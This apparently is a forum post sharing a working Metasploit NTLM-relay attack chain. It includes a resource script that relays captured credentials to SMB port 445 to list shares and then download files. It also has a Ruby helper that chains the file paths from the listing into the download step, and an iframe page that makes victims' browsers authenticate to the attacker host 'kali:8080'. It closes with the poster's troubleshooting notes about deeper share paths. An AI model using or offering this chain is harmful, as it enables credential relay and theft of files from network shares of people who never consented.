resource.rb
use auxiliary/server/http_ntlmrelay
unset all
notes -d
set RHOST
set RPORT 445
set RTYPE SMB_LS
set RURIPATH
set URIPATH test1
run
set RTYPE SMB_GET
set SYNCFILE syncfile.rb
set URIPATH test2
run
syncfile.rb
print_status("looking for data...")
framework.db.notes.each do |note|
if (note.ntype == 'ntlm_relay')
for app in note.data[:Response]
p1 = app[1].to_s.split(",")
if (p1[0] == '{"type"=>"F"')
datastore['RURIPATH']=note.data[:RURI]+app[0]
end
end
end
puts(datastore['RURIPATH'])
end
payload.html
[iframe src="http://kali:8080/test1"]
[iframe src="http://kali:8080/test2"]
The issues I'm having are, this method can only download one file at the moment and if the share's path goes deeper then one directory (i.e. path\to\share\) test1 does not authenticate properly and the attack fails. I have just started messing with the source code of the module but have not gotten anywhere yet. I will keep you posted if I figure anything out, if you have a solution please let me know! Thank you and enjoy.